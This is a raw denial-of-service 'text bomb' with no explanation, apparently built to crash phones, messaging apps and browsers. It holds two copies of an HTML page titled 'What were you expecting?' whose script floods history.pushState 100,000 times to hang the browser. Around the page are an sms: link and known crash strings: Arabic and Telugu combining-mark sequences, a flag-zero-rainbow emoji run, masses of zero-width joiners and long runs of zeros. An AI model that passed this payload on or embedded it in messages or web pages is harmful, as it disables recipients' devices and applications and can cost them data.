http://cydia.furcode.co/chaiOS2
sms:&recipient=Me:&body=E2%C2
000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 0000000000effective. Power لُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ 冗 --00000000000    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 <!DOCTYPE html>
<html><!DOCTYPE html>
<html>
    <body>
        <h1>What were you expecting?</h1>
        <script>
            (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
                    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
                    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
                    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

                    ga('create', 'UA-60737367-1', 'auto');
                    ga('send', 'pageview');
                </script>
                <script>
                    var total = "";
                    for( var i = 0; i < 100000; i++ ) {
                        total = total + i.toString();
                        history.pushState(0,0, total );
                    }
                </script>
            </body>
        </html>

    <body>
        <h1>What were you expecting?</h1>
        <script>
            (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
                    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
                    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
                    })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

                    ga('create', 'UA-60737367-1', 'auto');
                    ga('send', 'pageview');
                </script>
                <script>
                    var total = "";
                    for( var i = 0; i < 100000; i++ ) {
                        total = total + i.toString();
                        history.pushState(0,0, total );
                    }
                </script>
            </body>
        </html>
. Power لُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ 冗 --00000000000    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍  f    ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       🏳0🌈    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍          ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍ 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 oo000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000🏳0🌈   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 0000000000effective. Power لُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ 冗 --00000000000    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       🏳0🌈    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍ 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000🏳0🌈   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 0000000000effective. Power لُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ 冗 --00000000000    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       🏳0🌈    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍ 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000🏳0🌈   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       🏳0🌈    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍ 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 0000000000effective. Power لُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ 冗 --00000000000    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       🏳0🌈    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍   BLAKE    ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍       ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍      ‍ 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000🏳0🌈   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 000000000000000000000 000000000000000000000   000000000000000000000 000000000000000000000 